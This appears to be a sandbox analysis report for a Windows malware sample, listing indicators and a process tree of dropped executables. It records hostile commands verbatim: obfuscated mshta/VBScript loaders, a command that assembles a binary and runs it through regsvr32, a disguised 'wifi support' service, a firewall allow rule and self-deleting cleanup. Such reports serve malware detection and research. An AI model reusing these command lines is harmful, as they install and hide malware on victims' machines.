5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	DAC8.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	207	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	212	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

toolspab2.exe

pid	process
3320	toolspab2.exe
3320	toolspab2.exe
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3048
Suspicious behavior: MapViewOfSection 20 IoCs

Processes:

toolspab2.exe6D28.exe

pid process

3320 toolspab2.exe
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
3048
1688 6D28.exe

pid	process
3048

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

540E.exetaskkill.exe

description	pid	process
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeDebugPrivilege	1580	540E.exe
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeDebugPrivilege	4732	taskkill.exe
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048
Token: SeShutdownPrivilege	3048
Token: SeCreatePagefilePrivilege	3048

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

irecord.tmp

pid process

4564 irecord.tmp
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

FD22.exeFEE8.exe

pid process

4264 FD22.exe
4124 FEE8.exe
3048
Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid process

3048

pid	process
4564	irecord.tmp

pid	process
3048

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

toolspab2.exe540E.exe

description	pid	process	target process
PID 4648 wrote to memory of 3320	4648	toolspab2.exe	toolspab2.exe
PID 4648 wrote to memory of 3320	4648	toolspab2.exe	toolspab2.exe
PID 4648 wrote to memory of 3320	4648	toolspab2.exe	toolspab2.exe
PID 4648 wrote to memory of 3320	4648	toolspab2.exe	toolspab2.exe
PID 4648 wrote to memory of 3320	4648	toolspab2.exe	toolspab2.exe
PID 4648 wrote to memory of 3320	4648	toolspab2.exe	toolspab2.exe
PID 3048 wrote to memory of 4264	3048		FD22.exe
PID 3048 wrote to memory of 4264	3048		FD22.exe
PID 3048 wrote to memory of 4264	3048		FD22.exe
PID 3048 wrote to memory of 4124	3048		FEE8.exe
PID 3048 wrote to memory of 4124	3048		FEE8.exe
PID 3048 wrote to memory of 4124	3048		FEE8.exe
PID 3048 wrote to memory of 576	3048		540E.exe
PID 3048 wrote to memory of 576	3048		540E.exe
PID 3048 wrote to memory of 576	3048		540E.exe
PID 3048 wrote to memory of 964	3048		58E2.exe
PID 3048 wrote to memory of 964	3048		58E2.exe
PID 3048 wrote to memory of 964	3048		58E2.exe
PID 3048 wrote to memory of 1216	3048		5D19.exe
PID 3048 wrote to memory of 1216	3048		5D19.exe
PID 3048 wrote to memory of 1216	3048		5D19.exe
PID 576 wrote to memory of 1432	576	540E.exe	540E.exe
PID 576 wrote to memory of 1432	576	540E.exe	540E.exe
PID 576 wrote to memory of 1432	576	540E.exe	540E.exe
PID 3048 wrote to memory of 1436	3048		66AF.exe
PID 3048 wrote to memory of 1436	3048		66AF.exe
PID 3048 wrote to memory of 1436	3048		66AF.exe
PID 576 wrote to memory of 1580	576	540E.exe	540E.exe
PID 576 wrote to memory of 1580	576	540E.exe	540E.exe
PID 576 wrote to memory of 1580	576	540E.exe	540E.exe
PID 3048 wrote to memory of 1688	3048		6D28.exe
PID 3048 wrote to memory of 1688	3048		6D28.exe
PID 3048 wrote to memory of 1688	3048		6D28.exe
PID 3048 wrote to memory of 2012	3048		explorer.exe
PID 3048 wrote to memory of 2012	3048		explorer.exe
PID 3048 wrote to memory of 2012	3048		explorer.exe
PID 3048 wrote to memory of 2012	3048		explorer.exe
PID 576 wrote to memory of 1580	576	540E.exe	540E.exe
PID 576 wrote to memory of 1580	576	540E.exe	540E.exe
PID 576 wrote to memory of 1580	576	540E.exe	540E.exe
PID 576 wrote to memory of 1580	576	540E.exe	540E.exe
PID 576 wrote to memory of 1580	576	540E.exe	540E.exe
PID 3048 wrote to memory of 2460	3048		explorer.exe
PID 3048 wrote to memory of 2460	3048		explorer.exe
PID 3048 wrote to memory of 2460	3048		explorer.exe
PID 3048 wrote to memory of 2824	3048		explorer.exe
PID 3048 wrote to memory of 2824	3048		explorer.exe
PID 3048 wrote to memory of 2824	3048		explorer.exe
PID 3048 wrote to memory of 2824	3048		explorer.exe
PID 3048 wrote to memory of 3228	3048		explorer.exe
PID 3048 wrote to memory of 3228	3048		explorer.exe
PID 3048 wrote to memory of 3228	3048		explorer.exe
PID 3048 wrote to memory of 4052	3048		explorer.exe
PID 3048 wrote to memory of 4052	3048		explorer.exe
PID 3048 wrote to memory of 4052	3048		explorer.exe
PID 3048 wrote to memory of 4052	3048		explorer.exe
PID 3048 wrote to memory of 4020	3048		explorer.exe
PID 3048 wrote to memory of 4020	3048		explorer.exe
PID 3048 wrote to memory of 4020	3048		explorer.exe
PID 3048 wrote to memory of 3540	3048		explorer.exe
PID 3048 wrote to memory of 3540	3048		explorer.exe
PID 3048 wrote to memory of 3540	3048		explorer.exe
PID 3048 wrote to memory of 3540	3048		explorer.exe
PID 3048 wrote to memory of 4388	3048		explorer.exe

C:\Users\Admin\AppData\Local\Temp\toolspab2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspab2.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:4648

C:\Users\Admin\AppData\Local\Temp\toolspab2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspab2.exe"
2⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3320

C:\Users\Admin\AppData\Local\Temp\FD22.exe
C:\Users\Admin\AppData\Local\Temp\FD22.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4264

C:\Users\Admin\AppData\Local\Temp\FEE8.exe
C:\Users\Admin\AppData\Local\Temp\FEE8.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4124

C:\Users\Admin\AppData\Local\Temp\540E.exe
C:\Users\Admin\AppData\Local\Temp\540E.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:576

C:\Users\Admin\AppData\Local\Temp\540E.exe
C:\Users\Admin\AppData\Local\Temp\540E.exe
2⤵
- Executes dropped EXE
PID:1432

C:\Users\Admin\AppData\Local\Temp\540E.exe
C:\Users\Admin\AppData\Local\Temp\540E.exe
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1580

C:\Users\Admin\AppData\Local\Temp\58E2.exe
C:\Users\Admin\AppData\Local\Temp\58E2.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:964

C:\Users\Admin\AppData\Local\Temp\5D19.exe
C:\Users\Admin\AppData\Local\Temp\5D19.exe
1⤵
- Executes dropped EXE
PID:1216

C:\Users\Admin\AppData\Local\Temp\66AF.exe
C:\Users\Admin\AppData\Local\Temp\66AF.exe
1⤵
- Executes dropped EXE
PID:1436

C:\Users\Admin\AppData\Local\Temp\6D28.exe
C:\Users\Admin\AppData\Local\Temp\6D28.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1688

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2012

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2460

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2824

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3228

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4052

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4020

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3540

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4388

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4352

C:\Users\Admin\AppData\Local\Temp\DAC8.exe
C:\Users\Admin\AppData\Local\Temp\DAC8.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4324

C:\Users\Admin\AppData\Local\Temp\DAC8.exe
C:\Users\Admin\AppData\Local\Temp\DAC8.exe
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
PID:4564

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\4d2337ac-5d0a-444d-97e8-3ed4d56f35a9" /deny *S-1-1-0:(OI)(CI)(DE,DC)
3⤵
- Modifies file permissions
PID:3320

C:\Users\Admin\AppData\Local\Temp\DAC8.exe
"C:\Users\Admin\AppData\Local\Temp\DAC8.exe" --Admin IsNotAutoStart IsNotTask
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4948

C:\Users\Admin\AppData\Local\Temp\DAC8.exe
"C:\Users\Admin\AppData\Local\Temp\DAC8.exe" --Admin IsNotAutoStart IsNotTask
4⤵
- Executes dropped EXE
PID:4452

C:\Users\Admin\AppData\Local\c885151d-f37f-4911-a241-901989520b7c\build2.exe
"C:\Users\Admin\AppData\Local\c885151d-f37f-4911-a241-901989520b7c\build2.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3912

C:\Users\Admin\AppData\Local\c885151d-f37f-4911-a241-901989520b7c\build2.exe
"C:\Users\Admin\AppData\Local\c885151d-f37f-4911-a241-901989520b7c\build2.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4580

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\c885151d-f37f-4911-a241-901989520b7c\build2.exe" & del C:\ProgramData\*.dll & exit
7⤵
PID:4008

C:\Windows\SysWOW64\taskkill.exe
taskkill /im build2.exe /f
8⤵
- Kills process with taskkill
PID:936

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Delays execution with timeout.exe
PID:3132

C:\Users\Admin\AppData\Local\Temp\DC01.exe
C:\Users\Admin\AppData\Local\Temp\DC01.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:3872

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im DC01.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\DC01.exe" & del C:\ProgramData\*.dll & exit
2⤵
PID:4024

C:\Windows\SysWOW64\taskkill.exe
taskkill /im DC01.exe /f
3⤵
- Kills process with taskkill
PID:4332

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
3⤵
- Delays execution with timeout.exe
PID:3164

C:\Users\Admin\AppData\Local\Temp\E029.exe
C:\Users\Admin\AppData\Local\Temp\E029.exe
1⤵
- Executes dropped EXE
PID:4468

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBscRIPT:ClOSe (creAtEobJEct("WSCRIPt.ShElL" ). Run( "C:\Windows\system32\cmd.exe /Q /C TyPE ""C:\Users\Admin\AppData\Local\Temp\E029.exe"" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if """" == """" for %w in ( ""C:\Users\Admin\AppData\Local\Temp\E029.exe"" ) do taskkill -F -im ""%~Nxw"" " , 0 ,tRUe ) )
2⤵
PID:1124

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /Q /C TyPE "C:\Users\Admin\AppData\Local\Temp\E029.exe" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if "" =="" for %w in ( "C:\Users\Admin\AppData\Local\Temp\E029.exe" ) do taskkill -F -im "%~Nxw"
3⤵
PID:3196

C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe
..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT
4⤵
- Executes dropped EXE
PID:2132

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBscRIPT:ClOSe (creAtEobJEct("WSCRIPt.ShElL" ). Run( "C:\Windows\system32\cmd.exe /Q /C TyPE ""C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe"" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if ""-pLTfn82smRxoqI1Rgg5LiENy6ewubmT "" == """" for %w in ( ""C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe"" ) do taskkill -F -im ""%~Nxw"" " , 0 ,tRUe ) )
5⤵
PID:5028

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /Q /C TyPE "C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe" > ..\XrZhy2.eXe && StArT ..\XrZhY2.eXE -pLTfn82smRxoqI1Rgg5LiENy6ewubmT &if "-pLTfn82smRxoqI1Rgg5LiENy6ewubmT " =="" for %w in ( "C:\Users\Admin\AppData\Local\Temp\XrZhy2.eXe" ) do taskkill -F -im "%~Nxw"
6⤵
PID:5040

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCripT:cLose ( cReatEoBJEcT ( "WScript.sheLl" ). Run ( "CMd.EXe /C EChO YE%TIMe%i> q1Qo.EY & echo | seT /P = ""MZ"" > FIq2DqT_.Q &copy /b /y FIq2DQT_.Q + QBEZ3.8 + R5FQa3.v3P + WWAA.Ue5 + JBVF~.yS+rcEI.~+ Mj12.DS + q1QO.Ey ..\mRZCIH.DO & Del /q *& STart regsvr32.exe -S ..\MRZCIH.DO /U ",0 , true))
5⤵
PID:3264

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C EChO YE%TIMe%i> q1Qo.EY & echo | seT /P = "MZ" > FIq2DqT_.Q &copy /b /y FIq2DQT_.Q+ QBEZ3.8 +R5FQa3.v3P +WWAA.Ue5 + JBVF~.yS+rcEI.~+Mj12.DS +q1QO.Ey ..\mRZCIH.DO & Del /q *& STart regsvr32.exe -S ..\MRZCIH.DO /U
6⤵
PID:2212

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo "
7⤵
PID:584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>FIq2DqT_.Q"
7⤵
PID:1084

C:\Windows\SysWOW64\regsvr32.exe
regsvr32.exe -S ..\MRZCIH.DO /U
7⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
PID:1432

C:\Windows\SysWOW64\taskkill.exe
taskkill -F -im "E029.exe"
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4732

C:\Users\Admin\AppData\Local\Temp\FE60.exe
C:\Users\Admin\AppData\Local\Temp\FE60.exe
1⤵
- Executes dropped EXE
- Checks whether UAC is enabled
PID:1240

C:\Users\Admin\AppData\Local\Temp\45.exe
C:\Users\Admin\AppData\Local\Temp\45.exe
1⤵
- Executes dropped EXE
PID:2008

C:\Users\Admin\AppData\Local\Temp\is-74GEK.tmp\45.tmp
"C:\Users\Admin\AppData\Local\Temp\is-74GEK.tmp\45.tmp" /SL5="$301E2,188175,104448,C:\Users\Admin\AppData\Local\Temp\45.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4924

C:\Users\Admin\AppData\Local\Temp\is-7A9MQ.tmp\134 Vaporeondè_éçè_)))_.exe
"C:\Users\Admin\AppData\Local\Temp\is-7A9MQ.tmp\134 Vaporeondè_éçè_)))_.exe" /S /UID=rec7
3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:2688

C:\Program Files\Windows Photo Viewer\GMKQBZCYKT\irecord.exe
"C:\Program Files\Windows Photo Viewer\GMKQBZCYKT\irecord.exe" /VERYSILENT
4⤵
- Executes dropped EXE
PID:1528

C:\Users\Admin\AppData\Local\Temp\is-9N8LV.tmp\irecord.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9N8LV.tmp\irecord.tmp" /SL5="$150224,5808768,66560,C:\Program Files\Windows Photo Viewer\GMKQBZCYKT\irecord.exe" /VERYSILENT
5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:4564

C:\Program Files (x86)\i-record\I-Record.exe
"C:\Program Files (x86)\i-record\I-Record.exe" -silent -desktopShortcut -programMenu
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2724

C:\Users\Admin\AppData\Local\Temp\e8-fa243-ccc-912b1-d750580d584e7\Dahanoqehe.exe
"C:\Users\Admin\AppData\Local\Temp\e8-fa243-ccc-912b1-d750580d584e7\Dahanoqehe.exe"
4⤵
- Executes dropped EXE
PID:1060

C:\Users\Admin\AppData\Local\Temp\09-6c1f6-88a-6a4af-ddb820b25cd44\Bejymaepaho.exe
"C:\Users\Admin\AppData\Local\Temp\09-6c1f6-88a-6a4af-ddb820b25cd44\Bejymaepaho.exe"
4⤵
- Executes dropped EXE
PID:2184

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ndufxxcu.bbf\GcleanerEU.exe /eufive & exit
5⤵
PID:2644

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mog5ecye.hrf\installer.exe /qn CAMPAIGN="654" & exit
5⤵
PID:4676

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sbggmfda.map\Setup3310.exe /Verysilent /subid=623 & exit
5⤵
PID:2688

C:\Users\Admin\AppData\Local\Temp\sbggmfda.map\Setup3310.exe
C:\Users\Admin\AppData\Local\Temp\sbggmfda.map\Setup3310.exe /Verysilent /subid=623
6⤵
PID:2092

C:\Users\Admin\AppData\Local\Temp\is-M0CQM.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-M0CQM.tmp\Setup3310.tmp" /SL5="$10318,138429,56832,C:\Users\Admin\AppData\Local\Temp\sbggmfda.map\Setup3310.exe" /Verysilent /subid=623
7⤵
PID:3092

C:\Users\Admin\AppData\Local\Temp\is-HP91L.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-HP91L.tmp\Setup.exe" /Verysilent
8⤵
PID:5204

C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe
"C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe"
9⤵
PID:5488

C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe
"C:\Program Files (x86)\Data Finder\Versium Research\RunWW.exe"
9⤵
PID:5504

C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe
"C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"
9⤵
PID:5532

C:\Users\Admin\AppData\Local\Temp\is-E501Q.tmp\MediaBurner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-E501Q.tmp\MediaBurner.tmp" /SL5="$30470,303887,220160,C:\Program Files (x86)\Data Finder\Versium Research\MediaBurner.exe"
10⤵
PID:5656

C:\Program Files (x86)\Data Finder\Versium Research\updatetes.exe
"C:\Program Files (x86)\Data Finder\Versium Research\updatetes.exe"
9⤵
PID:5576

C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe
"C:\Program Files (x86)\Data Finder\Versium Research\guihuali-game.exe"
9⤵
PID:5568

C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe
"C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
9⤵
PID:5556

C:\Users\Admin\AppData\Local\Temp\is-SFC5D.tmp\LabPicV3.tmp
"C:\Users\Admin\AppData\Local\Temp\is-SFC5D.tmp\LabPicV3.tmp" /SL5="$3049A,506127,422400,C:\Program Files (x86)\Data Finder\Versium Research\LabPicV3.exe"
10⤵
PID:5648

C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe
"C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
9⤵
PID:5540

C:\Users\Admin\AppData\Local\Temp\is-CD81C.tmp\lylal220.tmp
"C:\Users\Admin\AppData\Local\Temp\is-CD81C.tmp\lylal220.tmp" /SL5="$20452,172303,88576,C:\Program Files (x86)\Data Finder\Versium Research\lylal220.exe"
10⤵
PID:5668

C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe
"C:\Program Files (x86)\Data Finder\Versium Research\NMemo3Setp.exe"
9⤵
PID:5520

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\syqxydem.owj\google-game.exe & exit
5⤵
PID:3956

C:\Users\Admin\AppData\Local\Temp\syqxydem.owj\google-game.exe
C:\Users\Admin\AppData\Local\Temp\syqxydem.owj\google-game.exe
6⤵
PID:1328

C:\Users\Admin\AppData\Local\Temp\syqxydem.owj\google-game.exe
"C:\Users\Admin\AppData\Local\Temp\syqxydem.owj\google-game.exe" -a
7⤵
PID:3476

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3y12jokp.xa1\BrowzarBrowser_J013.exe & exit
5⤵
PID:2328

C:\Users\Admin\AppData\Local\Temp\3y12jokp.xa1\BrowzarBrowser_J013.exe
C:\Users\Admin\AppData\Local\Temp\3y12jokp.xa1\BrowzarBrowser_J013.exe
6⤵
PID:1216

C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe
"C:\Program Files (x86)\Browzar\MrGh6bEH0L0a.exe"
7⤵
PID:5212

C:\Program Files (x86)\Browzar\Browzar.exe
"C:\Program Files (x86)\Browzar\Browzar.exe"
7⤵
PID:5252

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kuwzghps.nh4\GcleanerWW.exe /mixone & exit
5⤵
PID:676

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\snwal5pm.lru\toolspab1.exe & exit
5⤵
PID:5384

C:\Users\Admin\AppData\Local\Temp\snwal5pm.lru\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\snwal5pm.lru\toolspab1.exe
6⤵
PID:5480

C:\Users\Admin\AppData\Local\Temp\2061.exe
C:\Users\Admin\AppData\Local\Temp\2061.exe
1⤵
- Executes dropped EXE
PID:4484

C:\Users\Admin\AppData\Local\Temp\2061.exe
"C:\Users\Admin\AppData\Local\Temp\2061.exe"
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1076

C:\Users\Admin\AppData\Local\Temp\2583.exe
C:\Users\Admin\AppData\Local\Temp\2583.exe
1⤵
- Executes dropped EXE
PID:1124

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\tmyzlcrk\
2⤵
PID:2096

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\eqputlju.exe" C:\Windows\SysWOW64\tmyzlcrk\
2⤵
PID:3104

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" create tmyzlcrk binPath= "C:\Windows\SysWOW64\tmyzlcrk\eqputlju.exe /d\"C:\Users\Admin\AppData\Local\Temp\2583.exe\"" type= own start= auto DisplayName= "wifi support"
2⤵
PID:3924

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" description tmyzlcrk "wifi internet conection"
2⤵
PID:2296

C:\Windows\SysWOW64\sc.exe
"C:\Windows\System32\sc.exe" start tmyzlcrk
2⤵
PID:4264

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
2⤵
PID:1420

C:\Users\Admin\AppData\Local\Temp\3718.exe
C:\Users\Admin\AppData\Local\Temp\3718.exe
1⤵
- Executes dropped EXE
PID:4280

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
2⤵
PID:4604

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
3⤵
- Kills process with taskkill
PID:2208

C:\Users\Admin\AppData\Local\Temp\4820.exe
C:\Users\Admin\AppData\Local\Temp\4820.exe
1⤵
- Executes dropped EXE
PID:632

C:\Windows\SysWOW64\tmyzlcrk\eqputlju.exe
C:\Windows\SysWOW64\tmyzlcrk\eqputlju.exe /d"C:\Users\Admin\AppData\Local\Temp\2583.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3948

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
- Drops file in System32 directory
PID:2344

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:1872

